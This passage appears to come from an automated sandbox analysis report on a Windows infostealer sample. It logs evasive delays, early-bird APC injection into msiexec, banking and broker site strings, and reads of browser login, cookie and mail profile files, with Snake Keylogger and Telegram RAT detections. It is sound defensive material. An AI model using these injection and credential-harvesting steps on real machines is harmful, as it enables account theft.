Source: C:\Windows\SysWOW64\msiexec.exe TID: 5600	Thread sleep time: -595843s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5600	Thread sleep time: -595734s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5600	Thread sleep time: -595624s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5600	Thread sleep time: -595515s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5600	Thread sleep time: -595406s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5600	Thread sleep time: -595296s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5600	Thread sleep time: -595187s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5600	Thread sleep time: -595077s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5600	Thread sleep time: -594968s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5600	Thread sleep time: -594859s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5600	Thread sleep time: -594749s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5600	Thread sleep time: -594640s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\rPedidoactualizado.exe	Code function: 0_2_00402868 FindFirstFileW,	0_2_00402868
Source: C:\Users\user\Desktop\rPedidoactualizado.exe	Code function: 0_2_004065DA FindFirstFileW,FindClose,	0_2_004065DA
Source: C:\Users\user\Desktop\rPedidoactualizado.exe	Code function: 0_2_004059A9 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_004059A9

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599124	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598796	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598465	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598249	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598140	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598031	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597921	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597812	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597702	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597593	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597484	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597374	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597265	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597156	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597046	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596937	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596718	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596609	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596499	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596390	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596281	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596171	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596062	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595952	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595843	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595734	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595624	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595515	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595406	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595296	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595187	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595077	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594968	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594859	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594749	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594640	Jump to behavior

Source: msiexec.exe, 00000005.00000002.3292249295.00000000227F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: msiexec.exe, 00000005.00000002.3292249295.00000000227F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: msiexec.exe, 00000005.00000002.3292249295.00000000227F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: msiexec.exe, 00000005.00000002.3292249295.00000000224D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: msiexec.exe, 00000005.00000002.3292249295.00000000224D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: msiexec.exe, 00000005.00000002.3292249295.00000000224D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: msiexec.exe, 00000005.00000002.3277125256.00000000058D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: msiexec.exe, 00000005.00000002.3292249295.00000000224D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: msiexec.exe, 00000005.00000002.3292249295.00000000227F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: msiexec.exe, 00000005.00000002.3292249295.00000000227F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: msiexec.exe, 00000005.00000002.3292249295.00000000224D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: msiexec.exe, 00000005.00000002.3292249295.00000000227F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: msiexec.exe, 00000005.00000002.3292249295.00000000227F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: msiexec.exe, 00000005.00000002.3292249295.00000000224D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: msiexec.exe, 00000005.00000002.3292249295.00000000224D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: msiexec.exe, 00000005.00000002.3292249295.00000000224D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: msiexec.exe, 00000005.00000002.3292249295.00000000224D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: msiexec.exe, 00000005.00000002.3292249295.00000000227F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: msiexec.exe, 00000005.00000002.3292249295.00000000224D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: msiexec.exe, 00000005.00000002.3292249295.00000000224D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: msiexec.exe, 00000005.00000002.3292249295.00000000227F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: msiexec.exe, 00000005.00000002.3292249295.00000000227F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: msiexec.exe, 00000005.00000002.3292249295.00000000224D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: msiexec.exe, 00000005.00000002.3292249295.00000000227F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: msiexec.exe, 00000005.00000002.3292249295.00000000224D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: msiexec.exe, 00000005.00000002.3292249295.00000000224D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: msiexec.exe, 00000005.00000002.3292249295.00000000227F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: msiexec.exe, 00000005.00000002.3292249295.00000000224D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: msiexec.exe, 00000005.00000002.3277125256.000000000587A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0
Source: msiexec.exe, 00000005.00000002.3292249295.00000000227F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: msiexec.exe, 00000005.00000002.3292249295.00000000227F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: msiexec.exe, 00000005.00000002.3292249295.00000000224D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: msiexec.exe, 00000005.00000002.3292249295.00000000227F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: msiexec.exe, 00000005.00000002.3292249295.00000000227F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: msiexec.exe, 00000005.00000002.3292249295.00000000227F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: msiexec.exe, 00000005.00000002.3292249295.00000000224D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: msiexec.exe, 00000005.00000002.3292249295.00000000224D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: msiexec.exe, 00000005.00000002.3292249295.00000000227F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: msiexec.exe, 00000005.00000002.3292249295.00000000224D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: msiexec.exe, 00000005.00000002.3292249295.00000000224D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: msiexec.exe, 00000005.00000002.3292249295.00000000224D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: msiexec.exe, 00000005.00000002.3292249295.00000000224D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: msiexec.exe, 00000005.00000002.3292249295.00000000224D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: msiexec.exe, 00000005.00000002.3292249295.00000000227F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: msiexec.exe, 00000005.00000002.3292249295.00000000224D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: msiexec.exe, 00000005.00000002.3292249295.00000000224D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: msiexec.exe, 00000005.00000002.3292249295.00000000227F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: msiexec.exe, 00000005.00000002.3292249295.00000000224D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: msiexec.exe, 00000005.00000002.3292249295.00000000224D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: msiexec.exe, 00000005.00000002.3292249295.00000000227F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: msiexec.exe, 00000005.00000002.3292249295.00000000224D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: msiexec.exe, 00000005.00000002.3292249295.00000000227F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: msiexec.exe, 00000005.00000002.3292249295.00000000224D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: msiexec.exe, 00000005.00000002.3292249295.00000000224D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: msiexec.exe, 00000005.00000002.3292249295.00000000227F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: msiexec.exe, 00000005.00000002.3292249295.00000000227F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: msiexec.exe, 00000005.00000002.3277125256.00000000058D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWG
Source: msiexec.exe, 00000005.00000002.3292249295.00000000227F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: msiexec.exe, 00000005.00000002.3292249295.00000000227F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: msiexec.exe, 00000005.00000002.3292249295.00000000227F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: msiexec.exe, 00000005.00000002.3292249295.00000000227F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: msiexec.exe, 00000005.00000002.3292249295.00000000227F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: msiexec.exe, 00000005.00000002.3292249295.00000000227F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: msiexec.exe, 00000005.00000002.3292249295.00000000224D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: msiexec.exe, 00000005.00000002.3292249295.00000000227F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x

Source: C:\Users\user\Desktop\rPedidoactualizado.exe	API call chain: ExitProcess graph end node			graph_0-3411
Source: C:\Users\user\Desktop\rPedidoactualizado.exe	API call chain: ExitProcess graph end node			graph_0-3565

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 2_2_0505D504 LdrInitializeThunk,

2_2_0505D504

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process token adjusted: Debug			Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Early bird code injection technique detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\SysWOW64\msiexec.exe base: 3B50000

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\rPedidoactualizado.exe

0_2_0040336C

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000005.00000002.3290429199.0000000021441000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: msiexec.exe PID: 2364, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\msiexec.exe

File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\

Jump to behavior

Source: Yara match

File source: Process Memory Space: msiexec.exe PID: 2364, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000005.00000002.3290429199.0000000021441000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: msiexec.exe PID: 2364, type: MEMORYSTR

